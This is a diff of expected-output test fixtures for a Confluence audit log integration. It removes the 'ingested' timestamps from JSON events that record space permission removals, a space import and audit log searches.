@@ -8892,7 +8797,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837547044Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.204Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -8980,7 +8884,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837548095Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.200Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9068,7 +8971,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837549071Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.194Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9156,7 +9058,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837550179Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9237,7 +9138,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837551091Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.176Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9318,7 +9218,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837552017Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.166Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9406,7 +9305,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837552920Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.160Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9494,7 +9392,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837553824Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.155Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9582,7 +9479,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837554693Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.149Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9663,7 +9559,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837555568Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.143Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9751,7 +9646,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837556547Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.137Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9839,7 +9733,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837557553Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.132Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -9927,7 +9820,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837558523Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.128Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10015,7 +9907,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837559721Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.122Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10103,7 +9994,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837560661Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.115Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10184,7 +10074,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837561674Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.107Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10272,7 +10161,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837562616Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.099Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10360,7 +10248,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837563585Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.091Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10448,7 +10335,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837564624Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.055Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10529,7 +10415,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837565595Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.008Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10630,7 +10515,6 @@ }, "event": { "action": "audit.logging.summary.space.config.updated", - "ingested": "2021-12-24T00:46:29.837566510Z", "original": "{\"timestamp\":\"2021-11-23T00:39:36.900Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.spaces\",\"category\":\"Spaces\",\"actionI18nKey\":\"audit.logging.summary.space.config.updated\",\"action\":\"Space configuration updated\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"\"},{\"key\":\"Home page\",\"i18nKey\":\"Home page\",\"to\":\"page: asdf v.1 (65593)\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"asdf\"},{\"key\":\"Space key\",\"i18nKey\":\"Space key\",\"to\":\"ASDF\"},{\"key\":\"Space status\",\"i18nKey\":\"Space status\",\"to\":\"CURRENT\"},{\"key\":\"Space type\",\"i18nKey\":\"Space type\",\"to\":\"global\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "change" 
@@ -10705,7 +10589,6 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-24T00:46:29.837567658Z", "original": "{\"timestamp\":\"2021-11-23T00:39:36.323Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -10789,7 +10672,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837568627Z", "original": "{\"timestamp\":\"2021-11-23T00:39:11.067Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"52 - 61\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:39:11.057109Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.299Z - 2021-11-23T00:38:58.965Z\"}]}", "type": "info", "kind": "event" 
@@ -10873,7 +10755,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837569578Z", "original": "{\"timestamp\":\"2021-11-23T00:38:58.965Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"60 - 60\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:58.959089Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"1\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:38:57.393Z - 2021-11-23T00:38:57.393Z\"}]}", "type": "info", "kind": "event" 
